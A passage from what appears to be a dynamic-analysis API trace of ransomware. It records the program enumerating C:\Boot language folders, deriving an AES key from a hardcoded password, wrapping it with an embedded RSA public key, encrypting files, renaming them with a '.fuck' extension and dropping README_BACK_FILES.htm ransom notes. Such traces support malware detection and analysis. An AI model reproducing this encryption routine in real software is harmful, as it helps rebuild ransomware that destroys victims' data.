"c:\\boot\\da-dk\\readme_back_files.htm")) returned 0xffffffff [0126.479] AreFileApisANSI () returned 1 [0126.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d168, cbMultiByte=-1, lpWideCharStr=0x5c5000, cchWideChar=37 | out: lpWideCharStr="C:\\\\Boot\\da-DK\\README_BACK_FILES.htm") returned 37 [0126.479] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\README_BACK_FILES.htm" (normalized: "c:\\boot\\da-dk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.481] GetFileType (hFile=0x5cec) returned 0x1 [0126.481] GetLastError () returned 0x0 [0126.481] SetLastError (dwErrCode=0x0) [0126.481] GetLastError () returned 0x0 [0126.481] SetLastError (dwErrCode=0x0) [0126.482] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.483] CloseHandle (hObject=0x5cec) returned 1 [0126.483] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.483] FindFirstFileA (in: lpFileName="C:\\\\Boot\\de-DE\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0126.483] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.483] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.483] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.484] GetLastError () returned 0x0 [0126.484] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.485] GetLastError () returned 0x0 [0126.485] SetLastError (dwErrCode=0x0) [0126.486] GetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0126.486] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.486] CreateFileA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.486] CreateFileA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.487] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.487] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df958) returned 1 [0126.489] CryptCreateHash (in: hProv=0x27df958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.489] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.489] CryptHashData (hHash=0x69d6e8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.489] CryptDeriveKey (in: hProv=0x27df958, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d368) returned 1 [0126.489] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.489] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.489] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27df490) returned 1 [0126.489] CryptImportPublicKeyInfo (in: hCryptProv=0x27df490, dwCertEncodingType=0x1, pInfo=0x27da448*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da478*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da480*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69d568) returned 1 [0126.490] CryptEncrypt (in: hKey=0x69d568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.490] CryptEncrypt (in: hKey=0x69d568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27df8d0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27df8d0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.490] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27df8d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27df8d0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.491] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e2b78, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e2b78, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.491] CryptEncrypt (in: hKey=0x69d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e2b78*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e2b78*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.491] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e2b78*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e2b78*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.491] CloseHandle (hObject=0xffffffff) returned 1 [0126.491] CloseHandle (hObject=0x5cd8) returned 1 [0126.492] CopyFileA (lpExistingFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.495] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.495] DeleteFileA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.gsg")) returned 1 [0126.496] MoveFileA (lpExistingFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.fuck")) returned 0 [0126.496] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.496] CryptDestroyKey (hKey=0x69d368) returned 1 [0126.496] CryptReleaseContext (hProv=0x27df958, dwFlags=0x0) returned 1 [0126.496] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.496] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.496] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] SetLastError (dwErrCode=0x5) [0126.497] GetLastError () returned 0x5 [0126.497] GetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui")) returned 0x20 [0126.498] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0126.498] CreateFileA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.498] CreateFileA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.499] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.499] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27dfc00) returned 1 [0126.501] CryptCreateHash (in: hProv=0x27dfc00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.501] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.501] CryptHashData (hHash=0x69d6e8, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.501] CryptDeriveKey (in: hProv=0x27dfc00, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.501] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.501] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.501] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27dfa68) returned 1 [0126.502] CryptImportPublicKeyInfo (in: hCryptProv=0x27dfa68, dwCertEncodingType=0x1, pInfo=0x27da378*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da3a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da3b0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69d5e8) returned 1 [0126.502] CryptEncrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.502] CryptEncrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27dfc88*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27dfc88*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.502] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27dfc88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27dfc88*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.502] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e4230, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e4230, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.502] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e4230*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e4230*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.502] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e4230*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e4230*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.503] CloseHandle (hObject=0xffffffff) returned 1 [0126.503] CloseHandle (hObject=0x5cd8) returned 1 [0126.503] CopyFileA (lpExistingFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0126.506] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0126.507] DeleteFileA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.gsg")) returned 1 [0126.507] MoveFileA (lpExistingFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.fuck")) returned 0 [0126.508] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.508] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.508] CryptReleaseContext (hProv=0x27dfc00, dwFlags=0x0) returned 1 [0126.508] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.508] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0126.508] GetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\de-de\\readme_back_files.htm")) returned 0xffffffff [0126.508] AreFileApisANSI () returned 1 [0126.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d210, cbMultiByte=-1, lpWideCharStr=0x5c4ad8, cchWideChar=37 | out: lpWideCharStr="C:\\\\Boot\\de-DE\\README_BACK_FILES.htm") returned 37 [0126.508] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\de-de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.510] GetFileType (hFile=0x5cec) returned 0x1 [0126.510] GetLastError () returned 0x0 [0126.510] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.511] CloseHandle (hObject=0x5cec) returned 1 [0126.511] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.511] FindFirstFileA (in: lpFileName="C:\\\\Boot\\el-GR\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d428 [0126.512] FindNextFileA (in: hFindFile=0x69d428, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.512] FindNextFileA (in: hFindFile=0x69d428, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.512] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.512] GetLastError () returned 0x0 [0126.512] GetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0126.512] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.512] CreateFileA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.512] CreateFileA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.513] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.513] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df628) returned 1 [0126.515] CryptCreateHash (in: hProv=0x27df628, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.515] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.515] CryptHashData (hHash=0x69d328, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.515] CryptDeriveKey (in: hProv=0x27df628, Algid=0x6610, hBaseData=0x69d328, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d368) returned 1 [0126.515] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.515] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.515] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27df958) returned 1 [0126.516] CryptImportPublicKeyInfo (in: hCryptProv=0x27df958, dwCertEncodingType=0x1, pInfo=0x27da788*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da7b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da7c0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dc68) returned 1 [0126.516] CryptEncrypt (in: hKey=0x69dc68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.516] CryptEncrypt (in: hKey=0x69dc68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27dfc00*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27dfc00*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.516] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27dfc00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27dfc00*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.517] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27e50e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e50e8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.517] CryptEncrypt (in: hKey=0x69d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e50e8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27e50e8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.517] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e50e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e50e8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.517] CloseHandle (hObject=0xffffffff) returned 1 [0126.517] CloseHandle (hObject=0x5cd8) returned 1 [0126.517] CopyFileA (lpExistingFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.520] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.521] DeleteFileA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.gsg")) returned 1 [0126.522] MoveFileA (lpExistingFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.fuck")) returned 0 [0126.522] CryptDestroyHash (hHash=0x69d328) returned 1 [0126.522] CryptDestroyKey (hKey=0x69d368) returned 1 [0126.522] CryptReleaseContext (hProv=0x27df628, dwFlags=0x0) returned 1 [0126.522] FindNextFileA (in: hFindFile=0x69d428, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.522] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.522] GetLastError () returned 0x5 [0126.522] GetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui")) returned 0x20 [0126.522] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0126.522] CreateFileA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.523] CreateFileA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.gsg" (normalized: 